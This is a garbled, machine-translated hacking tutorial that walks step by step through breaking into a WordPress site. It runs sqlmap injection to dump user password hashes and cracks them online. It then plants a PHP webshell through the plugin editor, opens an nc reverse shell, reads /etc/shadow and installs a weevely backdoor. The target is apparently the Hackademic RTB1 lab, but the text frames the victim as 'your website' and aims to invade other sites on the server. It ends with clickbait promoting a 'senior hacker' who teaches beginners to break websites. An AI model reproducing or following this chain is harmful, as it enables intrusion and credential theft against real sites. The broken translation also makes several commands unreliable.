---restore content starts---
Now we get the IP address of the Web server: 173.236.138.113
To find other sites on the same server, we use sameip.org.
We need the following information about your website:
- DNS Records (A, NS, TXT, MX and SOA)
- Web Server Type (Apache, IIS, Tomcat)
- Registrar (the company, owns your domain)
- Your name, address, email and phone
- Scripts that your site uses (PHP, ASP, ASP., JSP, CFM)
- Your Server OS (Unix,linux,windows,solaris)
- Your Server Open ports to the Internet (443, etc)
Let's start looking for your site's DNS records, we use who.is to accomplish this goal.
We found that your DNS records are as follows
Let's determine the type of Web server
We have now obtained the registration information of your website domain name, including your important information and so on.
We can get your website server OS type and server version through Whatweb in Backtrack5.
We found that your website uses the famous PHP whole station program WordPress, the server's system type is Fedoralinux,web server version Apache 2.2.15. Continue to view Web server open ports, using the Penetration test tool Nmap:
1-find Services, the run on server (view service running on the server)
2-find Server OS (view OS version)
We will also use the W3AF tool in backtrack 5 R1:
[Email Protected]:/pentest/web/w3af#./w3af_gui
We enter the address of the website to be detected and select the Complete security audit option.
Wait a moment, and you'll see the results of the scan.
Discover that your site has SQL injection vulnerabilities, XSS vulnerabilities, and other vulnerabilities. Let's explore SQL injection vulnerabilities.
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
We found this URL with a SQL injection through the tool, and we detected the URL through Sqlmap.
Using sqlmap with–u URL
After a while, you'll see
Enter N Press ENTER to continue
We found that your site exists MySQL error injection, MySQL database version is 5.0. We try to collect the database name by adding the parameter "-dbs".
Found three databases, followed by the parameter "-D wordpress-tables" To view all the table names of the WordPress database
Use the parameter "-T wp_users–columns" to view the fields in the Wp_users table.
Next, guess the values for the fields User_login and User_pass. With the parameter "-C User_login,user_pass–dump"
We will find the user name and password hashes value. We need to hack the password through the following online hack website hashes
http://www.onlinehashcrack.com/free-hash-reverse.php
Login WordPress Backstage Wp-admin
Try uploading PHP Webshell to the server to make it easy to run some Linux commands. Look for any plugins you can edit on the Plugins page. We choose textile This plugin, edit insert our PHP webshell, click Update File, Then visit our Phpwebshell.
Phpwebshell is parsed, we can control the file of your website, but we only want to get the root of the Web server, to invade other sites on the server.
We use NC to bounce a shell, first listening on 5555 ports on our computer.
Then connect our computer in reverse on PHP webshell, enter your IP and port 5555.
Click Connect and we'll see
Next we try to execute some commands:
Id
uid=48 (Apache) gid=489 (Apache) groups=489 (Apache)
(Used to display the user's ID and group)
Pwd
/var/www/html/hackademic_rtb1/wp-content/plugins
(Displays the current path on the server)
Uname-a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 721:41:45 EST i686 i686 i386 gnu/linux
(Displays kernel version information)
We enter the ID command after execution is complete.
Id
We've found that we're already rooted.
Uid=0 (Root) gid=0 (root)
We can now view the/etc/shadow file
Cat/etc/shadow
2. Create a PHP backdoor with weevely with a password of Koko
[Email protected]:/pentest/backdoors/web/weevely#./main.py-g-O hax.php-p koko
Then upload it to the server and use it.
[Email protected]:/pentest/backdoors/web/weevely#./main.py-t-uhttp://hack-test.com/hackademic_rtb1/wp-content/ Plugins/hax.php-pkoko
Test our hax.php back door.
Finish it, sprinkle the flowers!
Dozens of sets of PDF books can be obtained from the private messages 007!
Senior hacker teaches small white how to break a website! Super Detailed teaching Tutorial! That's awesome.